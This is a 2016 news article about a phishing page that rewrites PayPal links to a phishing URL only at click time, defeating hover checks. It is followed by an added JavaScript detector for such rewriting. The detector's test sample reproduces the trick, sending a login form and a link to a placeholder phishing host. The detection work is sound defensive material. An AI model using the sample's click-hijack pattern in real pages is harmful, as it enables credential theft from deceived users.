Phishers are now showing you the correct links in the browser link preview tooltip, but redirecting you to the wrong URL

Jun 15, 2016 21:20 GMT  ·  By

Hovering over links to see their true destination may become a useless security tip in the near future if phishers get smart about their mode of operation and follow the example of a crook who recently managed to bypass this built-in browser feature.

Usually, phishing emails contain links that redirect users to Web pages crafted to look like the real service they're imitating.

Users have always been instructed to hover over links in the emails they receive, or over the buttons on a suspicious page, to check whether they lead back to a trusted domain or only to a look-alike URL.

New phishing trick uses JavaScript to hijack the user's clicked links

A UK-based security researcher known as @dvk01uk, owner of the My Online Security blog, has come across a new phishing trick.

He says he spotted a phishing email that contained an HTML page attachment. When he opened the page in his browser, the page loaded using a local client-side URL, but this wasn't what caught his eye.

Hovering the "Submit" button showed an authentic PayPal URL, which made no sense. Why would a phisher go through all this effort to deliver a non-functional page that delivered phished credentials to the real PayPal website?

He found his answer in the JavaScript files loaded by this phishing email, which contained code that hijacked user clicks.

The malicious JS code was set to replace any request to paypal.com with the phishing URL, but only at the moment the user clicked the link. Hovering over the link triggered nothing, so the browser's tooltip still showed the genuine PayPal URL.

Close, but no cigar

The attacker's only mistake was to provide this HTML file as a downloadable page, something that should ring thousands of alarm bells with any user, since Web services never provide you with a copy of their Web pages, but ask you to visit their sites.

"Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of Phishing attacks yesterday, we would be in trouble, because users wouldn’t realise that they were giving their details to a phisher," My Online Security writes.

Unfortunately, if you can't read JavaScript code, you will have a hard time recognizing this phishing trick if it is ever implemented by a more capable cyber-crook.
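The click-time swap described above can be caught without reading the whole script by hand. The following audit is an added example, not code from the article or from the My Online Security blog: it scans an HTML attachment for links or forms that point at a trusted host yet carry an inline click handler, and for script blocks that both listen for a click-phase event and rewrite a navigation target. The trusted-host list, the `phish.example` placeholder and the two sample documents are constructed for this example; the regex checks are a heuristic and will not see through obfuscated scripts.

```javascript
// Trusted hosts whose appearance in a link/form target should never be overridden on click.
const TRUSTED_HOSTS = ["paypal.com", "www.paypal.com"];

// Hostname of an absolute URL, or null when the value is relative or unparseable.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Static audit of an HTML document: returns findings (empty array = nothing seen).
function auditHtml(html, trustedHosts = TRUSTED_HOSTS) {
  const findings = [];
  // 1. <a>/<form> whose static target is a trusted host but that also carries an inline
  //    click-phase handler: the tooltip shows the trusted URL, the handler decides where you go.
  const tagRe = /<(a|form)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[2];
    const target = /\b(?:href|action)\s*=\s*["']([^"']+)["']/i.exec(attrs);
    const host = target ? hostOf(target[1]) : null;
    const inlineHandler = /\bon(click|mousedown|mouseup|submit)\s*=/i.test(attrs);
    if (host && trustedHosts.includes(host) && inlineHandler) {
      findings.push({ kind: "inline-handler-on-trusted-link", target: target[1] });
    }
  }
  // 2. Script blocks that both listen for a click-phase event and rewrite a navigation
  //    target (href/action/location): the pattern the article describes.
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const listens = /\bon(click|mousedown|mouseup|submit)\b|addEventListener\s*\(\s*["'](click|mousedown|mouseup|submit)["']/i;
  const rewrites = /\.(href|action)\s*=[^=]|\blocation\s*(\.\s*(href|assign|replace)\s*)?[=(]|setAttribute\s*\(\s*["'](href|action)["']/i;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    if (listens.test(body) && rewrites.test(body)) {
      findings.push({ kind: "click-time-target-rewrite", snippet: body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// Constructed sample mimicking the attachment described in the article (placeholder host).
const SAMPLE_ATTACHMENT = `
<a href="https://www.paypal.com/signin" onmousedown="this.href='http://phish.example/a'">Sign in</a>
<form id="f" action="https://www.paypal.com/cgi-bin/webscr" method="post">
  <input name="login_email"><input type="submit" value="Submit">
</form>
<script>
  document.getElementById("f").addEventListener("submit", function () {
    this.action = "http://phish.example/collect"; // the real target, set only on click
  });
</script>`;
// Constructed benign page: a trusted link with no click-time rewriting.
const BENIGN_PAGE = `<p><a href="https://www.paypal.com/activity">View activity</a></p>
<script>console.log("ready");</script>`;
```

Running `auditHtml(SAMPLE_ATTACHMENT)` yields two findings (one per check) while `auditHtml(BENIGN_PAGE)` yields none; a mail gateway or sandbox can apply the same audit to every HTML attachment before a user ever hovers over it.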

Below is an image of the phishing page that opened in the user's browser from a local URL. Notice the address bar URL.

Image: Phishing email, provided as a downloadable email attachment
Image: Submit button leads back to the PayPal URL when hovering